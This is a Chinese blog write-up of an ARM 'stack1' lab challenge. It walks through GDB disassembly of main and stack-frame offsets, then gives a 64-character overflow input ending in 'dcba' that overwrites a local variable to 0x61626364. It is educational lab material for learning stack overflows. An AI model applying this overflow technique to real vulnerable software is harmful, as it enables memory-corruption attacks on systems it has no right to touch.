ARM 学习--Challenge stack 1

最新推荐文章于 2022-02-02 16:43:15 发布
最新推荐文章于 2022-02-02 16:43:15 发布
阅读量455 收藏
点赞数 1
分类专栏: 一无所知的渗透 文章标签: unctf arm 反汇编
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyou1995/article/details/114808284
版权

stack1

题目要掌握的知识点

  • 需要了解变量在内存中分布
  • 根据程序将变量修改为特定值
    在这里插入图片描述
运行

首先看看程序运行的效果,可以看到参数超长的时候会显示程序崩溃(分段错误)。并且显示0x31313131。
在这里插入图片描述

调试

这里要注意的是GDB版本在8.0 以上,需要在调试的一开始输入 starti
gef➤ break main
Breakpoint 1 at 0x104c8
gef➤ run
查看汇编代码
gef➤ disassemble main
Dump of assembler code for function main:
0x000104b0 <+0>: push {r11, lr}
0x000104b4 <+4>: add r11, sp, #4
0x000104b8 <+8>: sub sp, sp, #80 ; 0x50
0x000104bc <+12>: str r0, [r11, #-80] ; 0xffffffb0
0x000104c0 <+16>: str r1, [r11, #-84] ; 0xffffffac
0x000104c4 <+20>: ldr r3, [r11, #-80] ; 0xffffffb0
=> 0x000104c8 <+24>: cmp r3, #1
0x000104cc <+28>: bne 0x104dc <main+44>
0x000104d0 <+32>: mov r0, #1
0x000104d4 <+36>: ldr r1, [pc, #92] ; 0x10538 <main+136>
0x000104d8 <+40>: bl 0x10370 errx@plt
0x000104dc <+44>: mov r3, #0
0x000104e0 <+48>: str r3, [r11, #-8]
0x000104e4 <+52>: ldr r3, [r11, #-84] ; 0xffffffac
0x000104e8 <+56>: add r3, r3, #4
0x000104ec <+60>: ldr r3, [r3]
0x000104f0 <+64>: sub r2, r11, #72 ; 0x48
0x000104f4 <+68>: mov r0, r2
0x000104f8 <+72>: mov r1, r3
0x000104fc <+76>: bl 0x10340 strcpy@plt
0x00010500 <+80>: ldr r3, [r11, #-8]
0x00010504 <+84>: ldr r2, [pc, #48] ; 0x1053c <main+140>
0x00010508 <+88>: cmp r3, r2
0x0001050c <+92>: bne 0x1051c <main+108>
0x00010510 <+96>: ldr r0, [pc, #40] ; 0x10540 <main+144>
0x00010514 <+100>: bl 0x1034c puts@plt
0x00010518 <+104>: b 0x1052c <main+124>
0x0001051c <+108>: ldr r3, [r11, #-8]
0x00010520 <+112>: ldr r0, [pc, #28] ; 0x10544 <main+148>
0x00010524 <+116>: mov r1, r3
0x00010528 <+120>: bl 0x10334 printf@plt
0x0001052c <+124>: mov r0, r3
0x00010530 <+128>: sub sp, r11, #4
0x00010534 <+132>: pop {r11, pc}
0x00010538 <+136>: ; instruction: 0x000105bc
0x0001053c <+140>: cmnvs r2, r4, ror #6
0x00010540 <+144>: ldrdeq r0, [r1], -r8
0x00010544 <+148>: andeq r0, r1, r0, lsl r6
End of assembler dump.
根据分析和调试代码,了解代码之间的调用关系
在这里插入图片描述
首先第一块代码是分配栈空间,并且判断是否输入参数,输入参数就跳转到代码块3,主要是第四块,当R2和R3值相同的时候,就可以完成此题。
并且在调试的过程中,发现$r2 : 0x61626364 ("dcba"?)
并且R2的值是加载相对PC(用于保存下一条要执行的寄存器)的偏移地址的值。
R3的值是加载 R11(也就是FP 栈底)-8 地址的值。

R11 是 Frame Pointer地址(栈底),SP是栈顶,一般函数内的变量可以通过fp 取相对偏移获取,程序的输入参数也是这样。

从我们输入的超长字符可以看出,我们的输入的输入覆盖了[r11,#-8] ,然后0x00010500 <+80>: ldr r3, [r11, #-8] 就会把该地址的值加载给R3,然后R3的值就会和R2进行对比。因此只需要更改[r11, #-8]地址的值为0x61626364。那么R2和R3就会相等。
那么[r11,#-8] 的值是怎么传入的呢?
请看下面这段代码
0x000104dc <+44>: mov r3, #0
0x000104e0 <+48>: str r3, [r11, #-8]
0x000104e4 <+52>: ldr r3, [r11, #-84] ; 0xffffffac
0x000104e8 <+56>: add r3, r3, #4

可以看到会先初始化[r11, #-8] 地址的值。然后ldr r3, [r11, #-84]将输入的参数加载到r3中。

根据
0x000104b0 <+0>: push {r11, lr}
0x000104b4 <+4>: add r11, sp, #4
0x000104b8 <+8>: sub sp, sp, #80
可以了解整个栈空间的大小为
80+4+4(R11)+4(lr 函数返回地址) = 92 。栈空间总共92个字节,也就是23个word。
通过调试发现从第一个0x31313131算起,需要17 * 4 =64 个字符才能更改R11-#8的值。
在这里插入图片描述
在gdb 中输入64个字符串,其中最后4个字符串是dcba。
run 1111222233334444555566667777888899990000111122223333444455556666dcba
可以看到r3 的值成功被修改。
在这里插入图片描述

通过

并且成功显示获取正确的变量
在这里插入图片描述

Tig3rHu
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IDA分析HELLO ARM 程序的ARM 反汇编
追逐梦想,无悔青春
05-19 3223
#表明这个main函数是被程序导出的 EXPORT main #main为函数的名称IDA Pro 能自动识别源程序中所有的函数以及名称 main #IDA识别出的栈变量 var_C = -0xC var_8 = -8 #堆栈寻址指令 把寄存器的值压入堆栈 STMFD SP1,{R11,LR} #SP寄存器的值加上4 赋给R11寄存器 ADD   R11,SP,#4 #
[Android]安全第四步,看懂汇编
bluewindtalker的专栏
12-01 719
安全第四步,看懂汇编
ARM 汇编基础速成7】ARM汇编之栈与函数
lin___的博客
01-22 1805
原文地址: https://www.jianshu.com/p/f3f771f8f65b 原文链接https://azeria-labs.com/functions-and-the-stack-part-7/ 在这部分我们将研究一篇独特的内存区域叫做栈,讲解栈的目的以及相关操作。除此之外,我们还会研究ARM架构中函数的调用约定。 栈 一般来说,栈是一片在程序/进程中的内存区域。这...
ARM上函数调用参数超过四个的时传递方法
热门推荐
小猪爱拱地
05-28 1万+
众所周知,ARM架构下,函数参数是通过 r0~r4寄存器传递的;但是如果参数超过四个,就要借助于栈了。 下面以一个例子说明。 int func(int a1, int a2, int a3, int a4, int a5, int a6) { return a1 + a2 + a3 + a4 + a5; } int main(void) { func(1, 2, 3, 4, 5, 6);
-isportistics-fullstack-challenge
04-16
前端和后端集成 示范 :clipboard: 关于该项目 创建用于从表单发送和接收信息的API,将表中的参与率信息和表示该分布的甜甜圈图集成到一个表中。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行该...
redis-stack-server 7.2.0 安装包合集
最新发布
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
Full-stack-challenge
05-03
这是全栈应用程序的挑战 在上查看 要在CodeSandBox中运行代码,请按照下列步骤操作: 前往: : 登入 货叉和添加终端 在终端上,键入“ cd ./client && npm install && cd .....最后刷新CodeSandbox集成浏览器,然后...
full-stack-coding-challenge
04-03
从您收到我们办公室的挑战开始,您将有整整1周的时间来完成此挑战。 您可以通过将挑战推送到自己的git provider存储库中来提交挑战,并通过电子邮件与我们共享链接。 任务 纽约市的51个理事会成员希望使用仪表板应用...
react-native-card-stack-swiper:像React-native-card-stack swiper一样的Tinder
02-05
npm install --save react-native-card-stack-swiper 预习 import CardStack , { Card } from 'react-native-card-stack-swiper' ; < CardStack xss=removed xss=removed xss=removed> { this . swiper = swiper ...
android逆向学习,笔记(四)ARM汇编基础
王嘟嘟的博客
12-08 1216
这里是非虫笔记本,对学习知识的一种总结。有机会可以一起学习ARM汇编(非虫笔记)1.ARM汇编的目的:分析elf文件的需要。2.原生程序生成过程。(1)预处理,编译器处理c代码中的预处理指令。gcc -E hello.c -o hello.i(2)编译 gcc编译器首先要检查代码的规范性,以及是否有语法错误,在检查无误之后,gcc编译把代码翻译成ARM汇编语言的代码。gcc -S hello.i
C++对象 内存分布
小猪爱拱地
12-27 960
代码如下: class T { public : T(); virtual int f(void); private : int d; }; T::T(void) { d = 0x12345678; } int T::f(void) { return 12; } void x(T& t) {
Linux中const变量 分析和疑惑
qq_40525440的博客
07-09 409
提要:我在实习中,修改一个原有的linux驱动程序,但是遇到了一个很奇怪的问题:两个变量指向同一个地址,但是用printk打印两个变量的值,却一个是对的,另一个为0. 定义 赋值的地方就不展示了。 调试打印。 当然后面查到是因为const修饰过的问题。 但是也引出了更多的疑问: const的实现原理? 答:在编译的过程中,编译器会检查代码中是否有对const变量进行修改的代码,如果有则向用户报错。在编译通过后,const变量和普通变量相同。 按照问题1的说法,为什么用指针的方式,也会出现const变量
0x000001b8指令引用的0x000001b8内存该内存不能为read
fqq97fqq
01-17 859
0x000001b8指令引用的0x000001b8内存该内存不能为read 2011年10月28日   经常出现提示:“XXXX指令引用的XXXXX内存,该内存不能为read,(或written)终止?调试?”,无论你选择什么,都会退出。这个提示在任何时候都可能出现,是随机的,甚至在开机、关机时也会出现,特别是在运行较大型的软件、程序、游戏等情况下更容易出现。出现这种情况网上说法很多,也...
函数使用了堆栈的字节超过_安卓逆向:这是一篇逆向基础函数在ARM32中的刨根问底。...
weixin_39977488的博客
12-01 338
ARM32中函数需要关注的点有哪些?1.怎么去识别ARM的函数?2.函数采用什么样的调用约定?3.函数的参数是怎样进行传递的?4.函数的返回值是通过怎样接收存储?5.栈帧是什么东西?6.栈帧有什么作用?7.栈帧在函数中的使用?1.怎样在ARM汇编中去识别和定位出函数1.使用专门的跳转指令。1....
gdb调测使用整理
春夜喜雨的专栏
11-07 926
gdb调测使用 整理分为:源码对应查看,断点操作,运行调试,堆栈查看,内存查看,变量观察,layout设置 这几块。
笔记本启动显示0xc000014c错误--提示缺失win10/system32内部文件
m0_48837241的博客
02-02 5202
参考方案: 本人已经验证过,此方案可以解决问题,并且保留电脑内部原文件。 步骤1、准备一个win10系统启动U盘,制作教程网上有很多: win10官网:下载 Windows 10 需要注意的是:8G以上空白U盘,可以通过下载工具直接制作成系统盘;8G以下(最小也要5G以上)空白U盘,先下载ultraiso,再通过下载工具下载ISO映象文件,然后步骤见下: win10系统U盘制作过程 另附:ultraiso绿色版下载-软碟通ultraiso中文绿色版下载v9.7.1.3519 免安装版-旋风软件.
ARM汇编之堆栈溢出实战分析一(GDB)
github_38641765的博客
01-06 2341
转自:安全课传送门 引言 经过很长一段时间在azeria-labs进行的ARM基础汇编学习,学到了很多ARM汇编的基础知识、和简单的shellcode的编写,为了验证自己的学习成果,根据该网站提供的实例,做一次比较详细的逆向分析,和shellcode的实现,为自己的ARM入门学习巩固。 实例下载地址:git clone https://github.com...
第6章 ARM 汇编基础与逆向 第一节
安全参透之旅
03-15 691
第6章  ARM 汇编基础与逆向   1、 系统Santoku IP:192.168.153.133 2、 理解ARM汇编       1、 逆向你的原生Hello ARM 介绍 有过java开发经验的读者一定会知道,java程序的安全多依赖于代码混淆技术,这种技术通过更改程序中的方法,字段名来增加静态分析的难度,从而达到防止程序被破解的目的。Andriod系统采用java作为其平
gcc -o stack –g -z execstack -fno-stack-protector stack
06-10
具体来说,"-z execstack" 可以使得程序可以在堆栈上执行代码,而 "-fno-stack-protector" 可以禁用堆栈保护机制,从而使得攻击者可以更容易地利用堆栈溢出漏洞进行攻击。因此,这个编译命令可能会存在安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值